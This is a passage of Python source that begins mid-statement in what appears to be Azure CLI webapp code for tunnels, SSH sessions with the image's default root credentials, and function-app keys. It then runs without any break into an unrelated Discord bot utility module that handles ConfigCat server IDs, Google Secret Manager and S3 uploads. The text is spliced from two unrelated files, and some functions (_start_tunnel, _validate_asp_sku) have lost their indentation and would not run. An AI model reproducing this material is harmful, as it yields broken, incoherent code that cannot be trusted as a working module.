                 verify=not should_disable_connection_verify(), cookies=cookies)
def is_webapp_up(tunnel_server):
    """Proxy to the tunnel server's own webapp liveness probe."""
    up = tunnel_server.is_webapp_up()
    return up
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
    """Build and prime a TunnelServer to the app's SCM site.

    Validates that the app runs on Linux and, when *instance* is given, that
    it names an existing scaled-out instance (names are case-sensitive).
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if not webapp.reserved:
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)
    if port is None:
        logger.info('No port defined, creating on random free port')
        port = 0  # Will auto-select a free port from 1024-65535
    if instance is not None:
        known_instances = set(i.name for i in list_instances(cmd, resource_group_name, name, slot=slot))
        if instance not in known_instances:
            if slot is not None:
                raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
            raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
    _ping_scm_site(cmd, resource_group_name, name, instance=instance)
    _wait_for_webapp(tunnel_server)
    return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a local tunnel to the webapp and keep it alive until timeout or Ctrl+C.

    Fix: ``Thread.isAlive()`` was removed in Python 3.9; use ``is_alive()``.
    """
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)

    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()
    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)

    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        # Default SSH credentials baked into the App Service Linux container image.
        ssh_user_name = 'root'
        ssh_user_password = 'Docker!'
        logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)

    logger.warning('Ctrl + C to close')

    if timeout:
        time.sleep(int(timeout))
    else:
        # Block the main thread while the daemonized tunnel thread runs.
        while t.is_alive():
            time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a tunnel to the webapp and attach an interactive SSH session over it.

    Fix: ``Thread.isAlive()`` was removed in Python 3.9; use ``is_alive()``.
    """
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)

    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()

    # Default SSH credentials baked into the App Service Linux container image.
    ssh_user_name = 'root'
    ssh_user_password = 'Docker!'

    s = threading.Thread(target=_start_ssh_session,
                         args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
    s.daemon = True
    s.start()

    if timeout:
        time.sleep(int(timeout))
    else:
        # Keep the process alive while both the SSH session and the tunnel run.
        while s.is_alive() and t.is_alive():
            time.sleep(5)
def _wait_for_webapp(tunnel_server):
    """Poll the tunnel target once per second until it responds.

    Warns once immediately, then prints a dot per retry; raises CLIError after
    60 failed attempts.
    """
    attempts = 0
    while not is_webapp_up(tunnel_server):
        if attempts == 0:
            logger.warning('Connection is not ready yet, please wait')
        if attempts == 60:
            raise CLIError('SSH timeout, your app must be running before'
                           ' it can accept SSH connections. '
                           'Use `az webapp log tail` to review the app startup logs.')
        attempts += 1
        logger.warning('.')
        time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
    """Connect to the tunneled SSH endpoint (retrying up to 60 times) and run a login shell.

    On success prints the MOTD and execs an interactive shell; the connection is
    always closed afterwards.
    """
    attempt = 0
    while True:
        try:
            conn = Connection(host=hostname,
                              port=port,
                              user=username,
                              # connect_timeout=60*10,
                              connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if attempt == 0:
                logger.warning('Connection is not ready yet, please wait')
            if attempt == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            attempt += 1
            logger.warning('.')
            time.sleep(1)
    try:
        conn.run('cat /etc/motd', pty=True)
        conn.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        conn.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):  # pylint: disable=too-many-statements
    """Open an interactive SSH session to a Linux webapp through an SCM tunnel."""
    import platform

    # Guard clauses: no Windows client support, and no coexistence with remote debugging.
    if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on linux and mac')
    if get_site_configs(cmd, resource_group_name, name, slot).remote_debugging_enabled:
        raise CLIError('remote debugging is enabled, please disable')

    create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
        cmd,
        functionapp_name=None,
        organization_name=None,
        project_name=None,
        repository_name=None,
        overwrite_yaml=None,
        allow_force_push=None,
        github_pat=None,
        github_repository=None
):
    """Run the interactive Azure DevOps build/pipeline wizard for a function app."""
    from .azure_devops_build_interactive import AzureDevopsBuildInteractive
    wizard = AzureDevopsBuildInteractive(
        cmd, logger, functionapp_name, organization_name, project_name,
        repository_name, overwrite_yaml, allow_force_push,
        github_pat, github_repository)
    return wizard.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
    """Turn on filesystem application, web-server, and container logging for the app."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    return config_diagnostics(
        cmd, rg_name, name,
        application_logging=True,
        web_server_logging='filesystem',
        docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
    """Expand a bare ASE name into a full ARM resource ID; full IDs pass through unchanged."""
    if is_valid_resource_id(ase):
        return ase

    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.Web',
        type='hostingEnvironments',
        name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
    """Expand a bare Key Vault name into a full ARM resource ID; full IDs pass through unchanged."""
    if is_valid_resource_id(key_vault):
        return key_vault

    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.KeyVault',
        type='vaults',
        name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
    """Return True if *hostname* has a 'Verified' binding on the app (or slot).

    Fix: short-circuit on the first matching binding instead of scanning the
    whole list after a match was already found.
    NOTE(review): the binding name is lowercased but *hostname* is compared
    as-is — callers appear to pass an already-lowercased hostname; confirm
    before changing that.
    """
    hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                'list_host_name_bindings', slot)
    return any(
        binding.name.split('/')[-1].lower() == hostname and binding.host_name_type == 'Verified'
        for binding in hostname_bindings
    )
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
    """Create or update a host-level key on a function app (optionally on a slot)."""
    # pylint: disable=protected-access
    # Remap KeyInfo serialization so name/value are nested under 'properties',
    # which is the shape the ARM endpoint expects.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    webapps = web_client_factory(cmd.cli_ctx).web_apps
    if not slot:
        return webapps.create_or_update_host_secret(resource_group_name, name, key_type, key_name,
                                                    name1=key_name, value=key_value)
    return webapps.create_or_update_host_secret_slot(resource_group_name, name, key_type, key_name, slot,
                                                     name1=key_name, value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
    """List host-level keys for a function app, optionally for a deployment slot."""
    webapps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return webapps.list_host_keys_slot(resource_group_name, name, slot)
    return webapps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
    """Delete a host-level key from a function app, reporting the outcome.

    Fix: when ``slot`` was given, the code fell through and also issued the
    non-slot delete, clobbering the slot result and deleting the production
    key; the two calls are now mutually exclusive.
    """
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
    else:
        result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
    if result.response.status_code == HTTPStatus.NO_CONTENT:
        return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
    if result.response.status_code == HTTPStatus.NOT_FOUND:
        return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
    return result
def show_function(cmd, resource_group_name, name, function_name):
    """Show a single function of a function app, or a not-found message."""
    client = web_client_factory(cmd.cli_ctx)
    function = client.web_apps.get_function(resource_group_name, name, function_name)
    if function is None:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return function
def delete_function(cmd, resource_group_name, name, function_name):
    """Delete a single function from a function app, reporting the outcome."""
    client = web_client_factory(cmd.cli_ctx)
    result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
    status = result.response.status_code
    if status == HTTPStatus.NO_CONTENT:
        return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
    if status == HTTPStatus.NOT_FOUND:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
    """Create or update a key on a single function (optionally on a slot)."""
    # pylint: disable=protected-access
    # Remap KeyInfo serialization so name/value are nested under 'properties',
    # which is the shape the ARM endpoint expects.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    webapps = web_client_factory(cmd.cli_ctx).web_apps
    if not slot:
        return webapps.create_or_update_function_secret(resource_group_name, name, function_name, key_name,
                                                        name1=key_name, value=key_value)
    return webapps.create_or_update_function_secret_slot(resource_group_name, name, function_name, key_name, slot,
                                                         name1=key_name, value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
    """List the keys of one function, optionally for a deployment slot."""
    webapps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return webapps.list_function_keys_slot(resource_group_name, name, function_name, slot)
    return webapps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
    """Delete a function-scoped key, reporting the outcome.

    Fix: when ``slot`` was given, the code fell through and also issued the
    non-slot delete, clobbering the slot result and deleting the production
    key; the two calls are now mutually exclusive (same bug as
    ``delete_host_key``).
    """
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        result = client.web_apps.delete_function_secret_slot(resource_group_name,
                                                             name,
                                                             function_name,
                                                             key_name,
                                                             slot,
                                                             raw=True)
    else:
        result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
    if result.response.status_code == HTTPStatus.NO_CONTENT:
        return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
    if result.response.status_code == HTTPStatus.NOT_FOUND:
        return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
    return result
import asyncio
import io
import json
import logging
import os
import random
import re
import string
import subprocess
import sys
import typing
from pathlib import Path
from typing import Any, Awaitable, Callable, List, Tuple, Union
from threading import Thread
import boto3
import chat_exporter
import configcatclient
import discord
import requests
import sentry_sdk
from botocore.exceptions import ClientError
from discord import (
ApplicationCommandError,
Button,
ButtonStyle,
DiscordException,
SelectOption,
ui,
)
from discord.ext import commands
from dotenv import load_dotenv
from google.cloud import secretmanager
from google_auth_oauthlib.flow import Flow
from google.oauth2.credentials import Credentials
from google.oauth2 import service_account
from oauth2client.service_account import ServiceAccountCredentials
from core import database
load_dotenv()
# global variables
coroutineType = Callable[[Any, Any], Awaitable[Any]]
class ConfigcatClient:
    """ConfigCat feature-flag clients, one per server/department configuration.

    Each client is created at import time from an SDK key read out of the
    environment; the *_ID constant classes below resolve their Discord IDs
    through these clients.
    """

    MAIN_ID_CC = configcatclient.create_client(os.getenv("MAINID_CC"))
    STAFF_ID_CC = configcatclient.create_client(os.getenv("STAFFID_CC"))
    DIGITAL_ID_CC = configcatclient.create_client(os.getenv("DIGITALID_CC"))
    TECH_ID_CC = configcatclient.create_client(os.getenv("TECHID_CC"))
    MKT_ID_CC = configcatclient.create_client(os.getenv("MKTID_CC"))
    TUT_ID_CC = configcatclient.create_client(os.getenv("TUTID_CC"))
    CH_ID_CC = configcatclient.create_client(os.getenv("CHID_CC"))
    HR_ID_CC = configcatclient.create_client(os.getenv("HRID_CC"))
    LEADER_ID_CC = configcatclient.create_client(os.getenv("LEADERID_CC"))
    CHECK_DB_CC = configcatclient.create_client(os.getenv("CHECKDB_CC"))
    # Sandbox config refreshes every 10s so mode flips are picked up quickly.
    # NOTE(review): create_client_with_auto_poll is deprecated in newer
    # configcat-client releases — confirm the pinned version still ships it.
    SANDBOX_CONFIG_CC = configcatclient.create_client_with_auto_poll(os.getenv("SANDBOX_CONFIG_CC"), poll_interval_seconds=10)
async def rawExport(self, channel, response, user: discord.User):
    """Export *channel*'s history with chat_exporter and post it as an HTML attachment.

    Sends an embed plus the transcript file through *response* and returns the
    resulting message; returns None when no transcript could be produced.
    """
    transcript = await chat_exporter.export(channel, None)
    if transcript is None:
        return

    transcript_file = discord.File(
        io.BytesIO(transcript.encode()),
        filename=f"transcript-{channel.name}.html",
    )
    embed = discord.Embed(
        title="Channel Transcript",
        description=f"**Channel:** {channel.name}"
        f"\n**User Invoked:** {user.name}*"
        f"\nTranscript Attached Below*",
        color=discord.Colour.green(),
    )
    msg: discord.Message = await response.send(embed=embed, file=transcript_file)
    return msg
async def paginate_embed(
    bot: discord.Client,
    ctx,
    embed: discord.Embed,
    population_func,
    end: int,
    begin: int = 1,
    page=1,
):
    """Drive a reaction-based pager (◀️/▶️) over an embed.

    ``population_func(embed, page)`` is awaited to (re)fill the embed for each
    page; ``begin``/``end`` bound the page range. The loop exits after 60s
    without a valid reaction, clearing the reaction controls.
    """
    emotes = ["◀️", "▶️"]

    def check_reaction(reaction, user):
        # Only accept one of the paging emotes from the command author.
        return user == ctx.author and str(reaction.emoji) in emotes

    embed = await population_func(embed, page)
    if isinstance(embed, discord.Embed):
        message = await ctx.send(embed=embed)
    else:
        # population_func returned something unexpected; surface its type and stop.
        await ctx.send(str(type(embed)))
        return
    await message.add_reaction(emotes[0])
    await message.add_reaction(emotes[1])
    while True:
        try:
            reaction, user = await bot.wait_for(
                "reaction_add", timeout=60, check=check_reaction
            )
            if user == bot.user:
                continue
            if str(reaction.emoji) == emotes[1] and page < end:
                # Next page: repopulate, strip the user's reaction, redraw.
                page += 1
                embed = await population_func(embed, page)
                await message.remove_reaction(reaction, user)
                await message.edit(embed=embed)
            elif str(reaction.emoji) == emotes[0] and page > begin:
                # Previous page: repopulate, strip the user's reaction, redraw.
                page -= 1
                embed = await population_func(embed, page)
                await message.remove_reaction(reaction, user)
                await message.edit(embed=embed)
        except asyncio.TimeoutError:
            # No interaction for 60s: freeze on the current page, drop controls.
            await message.clear_reactions()
            break
def get_extensions():
    """Collect loadable extension module paths: jishaku plus every cog under ``utils``.

    Files whose name contains ``!`` or ``DEV`` are skipped. Paths are converted
    to dotted module notation using the platform's path separator.
    """
    separator = "\\" if sys.platform in ("win32", "cygwin") else "/"
    extensions = ["jishaku"]
    for candidate in Path("utils").glob("**/*.py"):
        if "!" in candidate.name or "DEV" in candidate.name:
            continue
        extensions.append(str(candidate).replace(separator, ".").replace(".py", ""))
    return extensions
def load_config(name) -> Tuple[dict, Path]:
    """Load (creating an empty one if needed) the RoleSync JSON config *name*.

    Returns the parsed dict together with the Path it was read from.
    """
    config_file = Path(f"utils/bots/RoleSync/{name}.json")
    config_file.touch(exist_ok=True)
    raw = config_file.read_text()
    if raw == "":
        # Freshly created file: seed it with an empty JSON object.
        config_file.write_text("{}")
        raw = "{}"
    return json.loads(raw), config_file
def prompt_config(msg, key, name="config"):
    """Prompt on stdin for *key* if it is missing from the config, then persist it.

    Fix: ``load_config`` requires a ``name`` argument but was called with none,
    so this always raised TypeError. A backward-compatible ``name`` parameter
    (defaulting to "config") is now forwarded.
    """
    config, config_file = load_config(name)
    if key not in config:
        config[key] = input(msg)
    with config_file.open("w+") as f:
        json.dump(config, f, indent=4)
def prompt_config2(msg, key, name="config"):
    """Set *key* to *msg* in the config and persist it.

    Fix: ``load_config`` requires a ``name`` argument but was called with none,
    so this always raised TypeError. A backward-compatible ``name`` parameter
    (defaulting to "config") is now forwarded.
    """
    config, config_file = load_config(name)
    config[key] = msg
    with config_file.open("w+") as f:
        json.dump(config, f, indent=4)
def access_secret(
    secret_id,
    google_auth_load_mode=False,
    type_auth=None,
    scopes=None,
    redirect_uri=None,
):
    """Access credentials and secrets from Google Secret Manager.

    Args:
        secret_id (str): The secret ID to access. (Options: doc_t, doc_c, tts_c, tsa_c, svc_c, adm_t)
        google_auth_load_mode (bool, optional): If True, return a credential
            object for authenticating with an API instead of the raw payload.
            Defaults to False.
        type_auth (int, optional): Type of credential class to return.
            (0: oauth2.credentials.Credentials, 1: oauthlib.flow.Flow,
            2: oauth2.service_account.Credentials,
            3: oauth2client ServiceAccountCredentials) Defaults to None.
        scopes (list[str], optional): Scopes to access; required when using
            google_auth_load_mode. Defaults to None.
        redirect_uri (str, optional): Redirect URL, required for mode 1.

    Returns:
        str | credential object: the raw secret payload, or a credential
        object when google_auth_load_mode is set.

    Raises:
        ValueError: if google_auth_load_mode is set with an unknown type_auth
            (previously this crashed with UnboundLocalError).
    """
    os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "gsheetsadmin/sstimmy.json"
    client = secretmanager.SecretManagerServiceClient()
    name = f"projects/ss-timmy/secrets/{secret_id}/versions/latest"
    response = client.access_secret_version(request={"name": name})
    payload = response.payload.data.decode("UTF-8")

    if not google_auth_load_mode:
        return payload

    if type_auth == 3:
        # Keyfile-dict credentials are built straight from the payload;
        # no temporary file is needed.
        return ServiceAccountCredentials.from_json_keyfile_dict(json.loads(payload), scopes)

    # The remaining loaders only accept file paths, so write the payload to a
    # temp file. Fix: the file is now removed even when a loader raises
    # (previously it leaked on error), via try/finally.
    cred_path = "cred_file.json"
    with open(cred_path, "w") as payload_file:
        payload_file.write(payload.replace("'", '"'))
    try:
        if type_auth == 0:
            creds = Credentials.from_authorized_user_file(cred_path, scopes)
        elif type_auth == 1:
            creds = Flow.from_client_secrets_file(
                cred_path, scopes=scopes, redirect_uri=redirect_uri
            )
        elif type_auth == 2:
            creds = service_account.Credentials.from_service_account_file(cred_path)
        else:
            raise ValueError(f"Unsupported type_auth: {type_auth!r}")
    finally:
        try:
            os.remove(cred_path)
        except FileNotFoundError:
            pass
    return creds
def S3_upload_file(file_name, bucket, object_name=None):
    """Upload a file to an S3 bucket.

    :param file_name: File to upload
    :param bucket: Bucket to upload to
    :param object_name: S3 object name. If not specified then file_name is used
    :return: True if file was uploaded, else False
    """
    # If S3 object_name was not specified, use file_name
    if object_name is None:
        object_name = os.path.basename(file_name)
    s3_client = boto3.client(
        "s3",
        aws_access_key_id=os.getenv("AWS_ACCESS_KEY_ID"),
        aws_secret_access_key=os.getenv("AWS_SECRET_ACCESS_KEY"),
        region_name="us-east-2",
    )
    try:
        # Transcripts are public HTML, hence the ContentType/ACL overrides.
        s3_client.upload_file(
            file_name,
            bucket,
            object_name,
            ExtraArgs={"ContentType": "text/html", "ACL": "public-read"},
        )
    except ClientError as e:
        print(e)
        # Fix: the docstring promised a boolean, but every path returned None.
        return False
    return True
class MAIN_ID:
    """
    IDs of the SS Main server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # *** Guilds ***
    g_main = int(ConfigcatClient.MAIN_ID_CC.get_value("g_main", 763119924385939498))

    # *** Channels ***
    ch_commands = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_commands", 763409002913595412))
    ch_seniorMods = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_seniormods", 878792926266810418))
    ch_moderators = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_moderators", 786068971048140820))
    ch_mutedChat = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_mutedchat", 808919081469739008))
    ch_modLogs = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_modlogs", 863177000372666398))
    ch_tutoring = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_tutoring", 865716647083507733))
    ch_transcriptLogs = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_transcriptlogs", 767434763337728030))
    ch_actionLogs = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_actionlogs", 767206398060396574))
    ch_modCommands = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_modcommands", 786057630383865858))
    ch_controlPanel = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_controlpanel", 843637802293788692))
    ch_startPrivateVC = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_startprivatevc", 784556875487248394))
    ch_announcements = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_announcements", 763121175764926464))
    ch_modAnnouncements = int(ConfigcatClient.MAIN_ID_CC.get_value("ch_modannouncements", 887780215789617202))

    # *** Categories ***
    cat_casual = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_casual", 763121170324783146))
    cat_community = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_community", 800163651805773824))
    cat_lounge = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_lounge", 774847738239385650))
    cat_events = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_events", 805299289604620328))
    cat_voice = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_voice", 763857608964046899))
    cat_scienceTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_scienceticket", 800479815471333406))
    cat_fineArtsTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_fineartsticket", 833210452758364210))
    cat_mathTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_mathticket", 800472371973980181))
    cat_socialStudiesTicket = int(
        ConfigcatClient.MAIN_ID_CC.get_value(
            "cat_socialstudiesticket", 800481237608824882
        )
    )
    cat_englishTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_englishticket", 800475854353596469))
    cat_essayTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_essayticket", 854945037875806220))
    cat_languageTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_languageticket", 800477414361792562))
    cat_otherTicket = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_otherticket", 825917349558747166))
    cat_privateVC = int(ConfigcatClient.MAIN_ID_CC.get_value("cat_privatevc", 776988961087422515))

    # *** Roles ***
    r_codingClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_codingclub", 883169286665936996))
    r_debateClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_debateclub", 883170141771272294))
    r_musicClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_musicclub", 883170072355561483))
    r_cookingClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_cookingclub", 883162279904960562))
    r_chessClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_chessclub", 883564455219306526))
    r_bookClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_bookclub", 883162511560560720))
    r_advocacyClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_advocacyclub", 883169000866070539))
    r_speechClub = int(ConfigcatClient.MAIN_ID_CC.get_value("r_speechclub", 883170166161149983))
    r_clubPresident = int(ConfigcatClient.MAIN_ID_CC.get_value("r_clubpresident", 883160826180173895))
    r_chatHelper = int(ConfigcatClient.MAIN_ID_CC.get_value("r_chathelper", 811416051144458250))
    r_leadHelper = int(ConfigcatClient.MAIN_ID_CC.get_value("r_leadhelper", 810684359765393419))
    r_essayReviser = int(ConfigcatClient.MAIN_ID_CC.get_value("r_essayreviser", 854135371507171369))
    # NOTE(review): r_tutor is hard-coded, unlike every other ID here which is
    # resolved through ConfigCat — confirm whether that is intentional.
    r_tutor = 778453090956738580

    # *** Messages ***
    # Tutoring
    msg_math = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_math", 866904767568543744))
    msg_science = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_science", 866904901174427678))
    msg_english = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_english", 866905061182930944))
    msg_language = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_language", 866905971519389787))
    msg_art = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_art", 866906016602652743))
    msg_socialStudies = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_socialstudies", 866905205094481951))
    msg_computerScience = int(ConfigcatClient.MAIN_ID_CC.get_value("msg_computerscience", 867550791635566623))
class STAFF_ID:
    """
    IDs of the SS Staff Community server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # *** Guilds ***
    g_staff = int(ConfigcatClient.STAFF_ID_CC.get_value("g_staff", 891521033700540457))

    # *** Channels ***
    ch_verificationLogs = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_verificationlogs", 894241199433580614))
    ch_verification = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_verification", 894240578651443232))
    ch_console = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_console", 895041227123228703))
    ch_startPrivateVC = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_startprivatevc", 895041070956675082))
    ch_announcements = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_announcements", 891920066550059028))
    ch_leadershipAnnouncements = int(ConfigcatClient.STAFF_ID_CC.get_value("ch_leadershipannouncements", 910357129972551710))

    # *** Categories ***
    cat_privateVC = int(ConfigcatClient.STAFF_ID_CC.get_value("cat_privatevc", 895041016057446411))

    # *** Roles ***
    r_director = int(ConfigcatClient.STAFF_ID_CC.get_value("r_director", 891521034333880416))
    r_SSDigitalCommittee = int(ConfigcatClient.STAFF_ID_CC.get_value("r_ssdigitalcommittee", 898772246808637541))
    r_chairpersonSSDCommittee = int(ConfigcatClient.STAFF_ID_CC.get_value("r_chairpersonssdcommittee", 934971902781431869))
    r_executiveAssistant = int(ConfigcatClient.STAFF_ID_CC.get_value("r_executiveassistant", 892535575574372372))
    r_chapterPresident = int(ConfigcatClient.STAFF_ID_CC.get_value("r_chapterpresident", 892532950019735602))
    r_organizationPresident = int(ConfigcatClient.STAFF_ID_CC.get_value("r_organizationpresident", 892532907078475816))
    r_vicePresident = int(ConfigcatClient.STAFF_ID_CC.get_value("r_vicepresident", 891521034371608671))
    r_president = int(ConfigcatClient.STAFF_ID_CC.get_value("r_president", 932861531224428555))
    r_editorInChief = int(ConfigcatClient.STAFF_ID_CC.get_value("r_editorinchief", 910269854592950352))
    r_corporateOfficer = int(ConfigcatClient.STAFF_ID_CC.get_value("r_corporateofficer", 932861485917540402))
    r_CHRO = int(ConfigcatClient.STAFF_ID_CC.get_value("r_chro", 892530791005978624))
    r_CIO = int(ConfigcatClient.STAFF_ID_CC.get_value("r_cio", 892530239996059728))
    r_CFO = int(ConfigcatClient.STAFF_ID_CC.get_value("r_cfo", 892530080029503608))
    r_CMO = int(ConfigcatClient.STAFF_ID_CC.get_value("r_cmo", 892529974303686726))
    r_CAO = int(ConfigcatClient.STAFF_ID_CC.get_value("r_cao", 892530033430790165))
    r_COO = int(ConfigcatClient.STAFF_ID_CC.get_value("r_coo", 892530902528307271))
    r_CEOandPresident = int(ConfigcatClient.STAFF_ID_CC.get_value("r_ceoandpresident", 892529865247580160))
    r_boardMember = int(ConfigcatClient.STAFF_ID_CC.get_value("r_boardmember", 891521034371608675))
    r_administrativeExecutive = int(ConfigcatClient.STAFF_ID_CC.get_value("r_administrativeexecutive", 946873101956841473))
    r_informationTechnology = int(ConfigcatClient.STAFF_ID_CC.get_value("r_informationtechnology", 891521034333880410))
class DIGITAL_ID:
    """
    IDs of the SS Digital server.
    (Docstring previously said "SS Staff Community server" — copy-paste error;
    every ID below is resolved through DIGITAL_ID_CC.)
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # *** Guilds ***
    g_digital = int(ConfigcatClient.DIGITAL_ID_CC.get_value("g_digital", 778406166735880202))

    # *** Channels ***
    ch_verification = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_verification", 878681438462050356))
    ch_waitingRoom = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_waitingroom", 878679747255750696))
